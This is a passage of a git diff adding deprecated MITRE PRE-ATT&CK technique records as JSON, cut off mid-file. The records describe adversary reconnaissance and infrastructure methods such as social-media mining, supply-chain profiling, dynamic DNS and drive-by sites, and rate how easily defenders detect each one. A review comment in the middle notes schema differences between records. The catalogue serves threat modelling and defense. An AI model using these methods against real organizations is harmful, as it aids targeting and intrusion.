@@ -0,0 +1,43 @@ +{ + "type": "bundle", + "id": "bundle--e431794b-b227-4a95-a2ec-114db3b39644", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--54eb2bab-125f-4d1c-b999-0c692860bafe", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Dynamic DNS", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1333).\n\nDynamic DNS is a automated method to rapidly update the domain name system mapping of hostnames to IPs. (Citation: FireEyeSupplyChain)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1333", + "external_id": "T1333" + }, + { + "source_name": "FireEyeSupplyChain", + "description": "FireEye. (2014). SUPPLY CHAIN ANALYSIS: From Quartermaster to SunshopFireEye. Retrieved March 6, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Defender will not know at first use what is valid or hostile traffic without more context.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "It is relatively easy to subscribe to dynamic DNS providers or find ways to get different IP addresses from a cloud provider.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1110", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "establish-&-maintain-infrastructure" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--57061a8a-d7c5-42a9-be60-f79526b95bf6.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--57061a8a-d7c5-42a9-be60-f79526b95bf6.json new file mode 100644 index 0000000000000000000000000000000000000000..69a3ac1516551f4a7299ec9589ee703824b4345a --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--57061a8a-d7c5-42a9-be60-f79526b95bf6.json 
@@ -0,0 +1,43 @@ +{ + "type": "bundle", + "id": "bundle--e9fb21ce-64ba-4cc7-a486-166df15aa31d", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--57061a8a-d7c5-42a9-be60-f79526b95bf6", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Test signature detection", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1292).\n\nAn adversary can test the detections of malicious emails or files by using publicly available services, such as virus total, to see if their files or emails cause an alert. They can also use similar services that are not openly available and don't publicly publish results or they can test on their own internal infrastructure. (Citation: WiredVirusTotal)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1292", + "external_id": "T1292" + }, + { + "source_name": "WiredVirusTotal", + "description": "Kim Zetter. (14, September 2). A Google Site Meant to Protect You Is Helping Hackers Attack You. Retrieved March 9, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "Partial", + "x_mitre_detectable_by_common_defenses_explanation": "If using a common service like [https://www.virustotal.com VirusTotal], it is possible to detect. 
If the adversary uses a hostile, less well-known service, the defender would not be aware.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Easy to automate upload/email of a wide range of data packages.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1069", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "technical-weakness-identification" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--57619ab3-f6a5-43c8-8dd1-b0b8a986a870.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--57619ab3-f6a5-43c8-8dd1-b0b8a986a870.json new file mode 100644 index 0000000000000000000000000000000000000000..ce8f0e9b4a1abac0e26febbf7293fcaf31ee3575 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--57619ab3-f6a5-43c8-8dd1-b0b8a986a870.json 
@@ -0,0 +1,43 @@ +{ + "type": "bundle", + "id": "bundle--8b4c1a1a-036b-46a8-b942-350a8ca973ec", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--57619ab3-f6a5-43c8-8dd1-b0b8a986a870", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Analyze business processes", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1301).\n\nBusiness processes, such as who typically communicates with who, or what the supply chain is for a particular part, provide opportunities for social engineering or other (Citation: Warwick2015)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1301", + "external_id": "T1301" + }, + { + "source_name": "Warwick2015", + "description": "Warwick Ashford. (2015, March). Cyber crime: What every business needs to know. Retrieved March 6, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Social engineering and other attempts to learn about business practices and processes would not immediately be associated with an impending cyber event.", + "x_mitre_difficulty_for_adversary": "No", + "x_mitre_difficulty_for_adversary_explanation": "To get any kind of fidelity into business processes would require insider access. 
Basic processes could be mapped, but understanding where in the organization these processes take place and who to target during any given phase of the process would generally be difficult.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1078", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "organizational-weakness-identification" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--58d0b955-ae3d-424a-a537-2804dab38793.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--58d0b955-ae3d-424a-a537-2804dab38793.json new file mode 100644 index 0000000000000000000000000000000000000000..7197e81874cd6095a71709d289f3ea50da7019d5 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--58d0b955-ae3d-424a-a537-2804dab38793.json 
@@ -0,0 +1,48 @@ +{ + "type": "bundle", + "id": "bundle--a45ee54a-d433-4158-9431-e494a0c9f8d5", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--58d0b955-ae3d-424a-a537-2804dab38793", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Unconditional client-side exploitation/Injected Website/Driveby", + "description": "**This technique has been deprecated. Please see ATT&CK's Initial Access and Execution tactics for replacement techniques.**\n\nA technique used to compromise victims wherein the victims visit a compromised website that redirects their browser to a malicious web site, such as an exploit kit's landing page. The exploit kit landing page will probe the victim's operating system, web browser, or other software to find an exploitable vulnerability to infect the victim. (Citation: GeorgeDriveBy) (Citation: BellDriveBy)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "external_id": "T1372", + "url": "https://attack.mitre.org/techniques/T1372" + }, + { + "description": "Torsten George. (2014, October 15). The Internet's Big Threat: Drive-by Attacks. Retrieved March 7, 2017.", + "source_name": "GeorgeDriveBy" + }, + { + "description": "Lee Bell. (2013, January 8). Drive-by exploits are the top web security threat, says ENISA. Retrieved March 7, 2017.", + "source_name": "BellDriveBy" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "launch" + } + ], + "modified": "2020-03-30T14:29:19.081Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_is_subtechnique": false, + "x_mitre_old_attack_id": "PRE-T1149", + "x_mitre_version": "1.0", + "x_mitre_difficulty_for_adversary_explanation": "Placing an exploit on a public web site for driveby types of delivery is not impossible. 
However, gaining access to a web site with high enough traffic to meet specific objectives could be the challenge.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_detectable_by_common_defenses_explanation": "With the use of malware detonation chambers (e.g., for web or email traffic), this improves detection. Encryption and other techniques reduces the efficacy of these defenses.", + "x_mitre_detectable_by_common_defenses": "Partial", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--59369f72-3005-4e54-9095-3d00efcece73.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--59369f72-3005-4e54-9095-3d00efcece73.json new file mode 100644 index 0000000000000000000000000000000000000000..0ece674d113ad198fa742e4eebb9f0fada29ef58 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--59369f72-3005-4e54-9095-3d00efcece73.json 
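Review bot: This object's deprecation banner differs from the rest of the set — `**This technique has been deprecated. Please see ATT&CK's Initial Access and Execution tactics for replacement techniques.**` rather than `This object is deprecated as its content has been merged into the enterprise domain...` — and it has no `versions/v7` archive link, an older `modified` of `2020-03-30T14:29:19.081Z`, and an extra `x_mitre_is_subtechnique` key. A consumer that strips banners by matching the common prefix string will leave this one intact, and one that follows the archive link will find none; key the filtering on the `x_mitre_deprecated` boolean rather than on description text, and treat the archive link as optional. The key set of these bundles is not uniform across files, so any loader should tolerate missing and extra `x_mitre_*` keys rather than assuming one schema.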
@@ -0,0 +1,47 @@ +{ + "type": "bundle", + "id": "bundle--f21d9cd6-1d95-4cf6-8e19-59267a566ffd", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--59369f72-3005-4e54-9095-3d00efcece73", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Identify supply chains", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1265).\n\nSupply chains include the people, processes, and technologies used to move a product or service from a supplier to a consumer. Understanding supply chains may provide an adversary with opportunities to exploit the people, their positions, and relationships, that are part of the supply chain. (Citation: SmithSupplyChain) (Citation: CERT-UKSupplyChain)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1265", + "external_id": "T1265" + }, + { + "source_name": "SmithSupplyChain", + "description": "Drew Smith. (2015). Is your supply chain safe from cyberattacks?. Retrieved March 5, 2017." + }, + { + "source_name": "CERT-UKSupplyChain", + "description": "CERT-UK. (2016, October 01). Cyber-security risks in the supply chain. Retrieved March 5, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Searching publicly available sources that cannot be monitored by a defender.", + "x_mitre_difficulty_for_adversary": "No", + "x_mitre_difficulty_for_adversary_explanation": "Requires an intensive process to obtain the full picture. It is possible to obtain basic information/some aspects via OSINT. 
May be easier in certain industries where there are a limited number of suppliers (e.g., SCADA).", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1042", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "people-information-gathering" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--5a68c603-d7f9-4535-927e-ab56819eaa85.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--5a68c603-d7f9-4535-927e-ab56819eaa85.json new file mode 100644 index 0000000000000000000000000000000000000000..2ad1baee3c99f7eb50634ef784446cf065bcae0b --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--5a68c603-d7f9-4535-927e-ab56819eaa85.json 
@@ -0,0 +1,44 @@ +{ + "type": "bundle", + "id": "bundle--76afcfdb-1f8e-46e8-ba24-156ea906c0b7", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--5a68c603-d7f9-4535-927e-ab56819eaa85", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Compromise 3rd party or closed-source vulnerability/exploit information", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1354).\n\nThere is usually a delay between when a vulnerability or exploit is discovered and when it is made public. An adversary may target the systems of those known to research vulnerabilities in order to gain that knowledge for use during a different attack. (Citation: TempertonDarkHotel)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1354", + "external_id": "T1354" + }, + { + "source_name": "TempertonDarkHotel", + "description": "Temperton, J. (2015, August 10). Hacking Team zero-day used in new Darkhotel attacks. 
Retrieved March 9, 2017.", + "url": "https://www.wired.co.uk/article/darkhotel-hacking-team-cyber-espionage" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "build-capabilities" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_old_attack_id": "PRE-T1131", + "x_mitre_version": "1.0", + "x_mitre_difficulty_for_adversary_explanation": "Finding, attacking, and compromising a 3rd party or closed vulnerability entity is challenging, because those containing the vulnerabilities should be very aware of attacks on their environments have a heightened awareness.", + "x_mitre_difficulty_for_adversary": "No", + "x_mitre_detectable_by_common_defenses_explanation": "The compromise of unknown vulnerabilities would provide little attack and warning against a defender, rendering it highly challenging to detect.", + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--5b6ce031-bb86-407a-9984-2b9700ac4549.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--5b6ce031-bb86-407a-9984-2b9700ac4549.json new file mode 100644 index 0000000000000000000000000000000000000000..03545aadec9c315600905fa29e68ef144558ced3 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--5b6ce031-bb86-407a-9984-2b9700ac4549.json 
@@ -0,0 +1,47 @@ +{ + "type": "bundle", + "id": "bundle--0b693858-fce3-47e1-b59f-5c08eb0b54b7", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--5b6ce031-bb86-407a-9984-2b9700ac4549", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Identify business relationships", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1272).\n\nBusiness relationship information includes the associates of a target and may be discovered via social media sites such as [LinkedIn](https://www.linkedin.com) or public press releases announcing new partnerships between organizations or people (such as key hire announcements in industry articles). This information may be used by an adversary to shape social engineering attempts (exploiting who a target expects to hear from) or to plan for technical actions such as exploiting network trust relationship. (Citation: RSA-APTRecon) (Citation: Scasny2015)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1272", + "external_id": "T1272" + }, + { + "source_name": "RSA-APTRecon", + "description": "Rotem Kerner. (2015, October). RECONNAISSANCE: A Walkthrough of the \u201cAPT\u201d Intelligence Gathering Process. Retrieved March 1, 2017." + }, + { + "source_name": "Scasny2015", + "description": "Gregory Scasny. (2015, September 14). Understanding Open Source Intelligence (OSINT) and its relationship to Identity Theft. Retrieved March 1, 2017." 
+ } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Searching publicly available sources that cannot be monitored by a defender. Much of this information is widely known and difficult to obscure.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Made easier by today's current social media.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1049", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "people-information-gathering" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--6063b486-a247-499b-976a-9de16f4e83bc.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--6063b486-a247-499b-976a-9de16f4e83bc.json new file mode 100644 index 0000000000000000000000000000000000000000..8ec4d2765d0ff612752e6b386d6d21af689da3fb --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--6063b486-a247-499b-976a-9de16f4e83bc.json 
@@ -0,0 +1,43 @@ +{ + "type": "bundle", + "id": "bundle--0ef3bf81-e147-4562-b629-eede2b528acf", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--6063b486-a247-499b-976a-9de16f4e83bc", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Develop KITs/KIQs", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1227).\n\nLeadership derives Key Intelligence Topics (KITs) and Key Intelligence Questions (KIQs) from the areas of most interest to them. KITs are an expression of management's intelligence needs with respect to early warning, strategic and operational decisions, knowing the competition, and understanding the competitive situation. KIQs are the critical questions aligned by KIT which provide the basis for collection plans, create a context for analytic work, and/or identify necessary external operations. (Citation: Herring1999)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1227", + "external_id": "T1227" + }, + { + "source_name": "Herring1999", + "description": "Jan P. Herring. (1999). Key Intelligence Topics: A Process to Identify and Define Intelligence Needs. Retrieved March 2, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Normally, defender is unable to detect. Few agencies and commercial organizations may have unique insights.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Normal aspect of adversary planning lifecycle. 
May not be done by all adversaries.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1004", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "priority-definition-planning" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--616238cb-990b-4c71-8f50-d8b10ed8ce6b.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--616238cb-990b-4c71-8f50-d8b10ed8ce6b.json new file mode 100644 index 0000000000000000000000000000000000000000..d64ea78c5e5d27dc75c16ec9bc3520f5e01c29b2 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--616238cb-990b-4c71-8f50-d8b10ed8ce6b.json 
@@ -0,0 +1,43 @@ +{ + "type": "bundle", + "id": "bundle--7edff919-6929-498c-8a25-f3f8efd7df47", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--616238cb-990b-4c71-8f50-d8b10ed8ce6b", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Use multiple DNS infrastructures", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1327).\n\nA technique used by the adversary similar to Dynamic DNS with the exception that the use of multiple DNS infrastructures likely have whois records. (Citation: KrebsStLouisFed)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1327", + "external_id": "T1327" + }, + { + "source_name": "KrebsStLouisFed", + "description": "Brian Krebs. (2015, May 18). St. Louis Federal Reserve Suffers DNS Breach. Retrieved March 6, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "Partial", + "x_mitre_detectable_by_common_defenses_explanation": "This is by design captured in public registration logs. Various tools and services exist to track/query/monitor domain name registration information. 
However, tracking multiple DNS infrastructures will likely require multiple tools/services or more advanced analytics.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Requires more planning, but feasible.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1104", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "establish-&-maintain-infrastructure" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--68b45999-bb0c-4829-bbd0-75d6dac57c94.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--68b45999-bb0c-4829-bbd0-75d6dac57c94.json new file mode 100644 index 0000000000000000000000000000000000000000..3d6802db8fa54cdb173839aaf502daeb0baf86aa --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--68b45999-bb0c-4829-bbd0-75d6dac57c94.json 
@@ -0,0 +1,43 @@ +{ + "type": "bundle", + "id": "bundle--3a9ec8a5-e76b-4b8d-80b7-a3a4b1c41802", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--68b45999-bb0c-4829-bbd0-75d6dac57c94", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Obtain templates/branding materials", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1281).\n\nTemplates and branding materials may be used by an adversary to add authenticity to social engineering message. (Citation: Scasny2015)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1281", + "external_id": "T1281" + }, + { + "source_name": "Scasny2015", + "description": "Gregory Scasny. (2015, September 14). Understanding Open Source Intelligence (OSINT) and its relationship to Identity Theft. Retrieved March 1, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Adversary may download templates or branding from publicly available presentations that the defender can't monitor.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Some branding information is publicly available when a corporation publishes their briefings to the internet which provides insight into branding information and template materials. 
An exhaustive list of templating and branding is likely not available on the internet.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1058", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "organizational-information-gathering" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--695b1cce-57d7-49ae-a2af-820d50153f12.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--695b1cce-57d7-49ae-a2af-820d50153f12.json new file mode 100644 index 0000000000000000000000000000000000000000..b8586ce6144cc58fe0b15e3540d09da42bde060a --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--695b1cce-57d7-49ae-a2af-820d50153f12.json 
@@ -0,0 +1,43 @@ +{ + "type": "bundle", + "id": "bundle--436c03da-0707-4c8d-82ed-df495b9fe166", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--695b1cce-57d7-49ae-a2af-820d50153f12", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Mine social media", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1273).\n\nAn adversary may research available open source information about a target commonly found on social media sites such as [Facebook](https://www.facebook.com), [Instagram](https://www.instagram.com), or [Pinterest](https://www.pinterest.com). Social media is public by design and provides insight into the interests and potentially inherent weaknesses of a target for exploitation by the adversary. (Citation: RSA-APTRecon)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1273", + "external_id": "T1273" + }, + { + "source_name": "RSA-APTRecon", + "description": "Rotem Kerner. (2015, October). RECONNAISSANCE: A Walkthrough of the \u201cAPT\u201d Intelligence Gathering Process. Retrieved March 1, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Searching publicly available sources that cannot be monitored by a defender.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Very public by design. 
Application of privacy settings is not a panacea.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1050", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "people-information-gathering" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--6baf6388-d49f-4804-86a4-5837240555cd.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--6baf6388-d49f-4804-86a4-5837240555cd.json new file mode 100644 index 0000000000000000000000000000000000000000..3d7d363a405ac2c5af160d288e6abb4ea679c700 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--6baf6388-d49f-4804-86a4-5837240555cd.json 
@@ -0,0 +1,43 @@ +{ + "type": "bundle", + "id": "bundle--255f4a1c-8073-4f04-b5c6-89022f328d4f", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--6baf6388-d49f-4804-86a4-5837240555cd", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Determine firmware version", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1258).\n\nFirmware is permanent software programmed into the read-only memory of a device. As with other types of software, firmware may be updated over time and have multiple versions. (Citation: Abdelnur Advanced Fingerprinting)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1258", + "external_id": "T1258" + }, + { + "source_name": "Abdelnur Advanced Fingerprinting", + "description": "Humberto J. Abdelnur, Radu State, Olivier Festor. (2008). Advanced Network Fingerprinting. Retrieved April 2, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "No easy way for defenders to detect when an adversary collects this information.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Depending upon the target device, there are variable ways for an adversary to determine the firmware version. In some cases, this information can be derived from easily obtained information. 
